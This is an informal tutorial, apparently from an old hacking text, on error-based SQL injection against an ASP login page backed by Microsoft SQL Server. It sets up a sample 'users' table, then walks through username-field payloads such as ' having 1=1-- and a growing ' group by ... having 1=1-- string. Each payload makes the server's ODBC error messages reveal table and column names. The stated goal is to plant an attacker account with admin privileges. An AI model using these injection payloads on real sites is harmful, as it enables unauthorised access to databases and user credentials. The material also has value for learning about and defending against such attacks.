This technique was first discovered by David Litchfield
and the author in the course of a penetration test;
David later wrote a paper on the technique, and subsequent authors
have referenced this work. This explanation discusses the mechanisms
underlying the 'error message' technique, enabling one to fully
understand it, and potentially originate variations of their own.

So I am giving credit where it is due ............

Lets do it - Our 'users' table may have been created with the following command:

create table users (id int,
username varchar(255),
password varchar(255),
privs int
)




and the users inserted:

insert into users values(0, 'admin', 'r00tr0x!', 0xffff)

insert into users values (0, 'guest', 'guest', 0x0000)

insert into users values (0, 'chris', 'password', 0x00ff)

insert into users values (0, 'frank', 'sesame', 0x00ff)

Ok, so we want to insert a user account for ourself. Without knowing the structure of the 'users' table, we are unlikely to meet with success. Even if luck is with us the significance of the 'privs' field is unclear. We might insert a '1' and give ourself a low-privileged account when we really wanted administrative access.

Fortunately, if we have 'Error messages'- default ASP structure (yes I did say fortunately - there is good in them sometimes) we can determine the entire structure of the DB ---

First we want to establish the names of the tables that the query operates on, and the names of the fields:

Username: ' having 1=1--

and we get this error:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]column 'users.id' is invalid in the select list vecause ot is not contained in an aggregate function and there is o GROUP BY clause.

/process_login.asp, line 35


So we now know the table name and column name of the first column and can continue throught the columns one field at a time using 'Group By'.

Username: 'group by users.id having 1=1--

And we get this error:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

/process_login.asp, line 35


Eventually we arrive at the following 'username':

' group by users.id, users.username, users.password, users.privs having 1=1--

We get here no errors and it is (at least functionally) equivalent to:

select * from users where username = ''

So we now know that the query is referencing only the 'users' table, and is using the columns 'id, username, password, privs' - respectively.

Of course it would be useful to figure out the types of each column, too.

I'v been up for about 60 hours straight and that will have to wait until part II.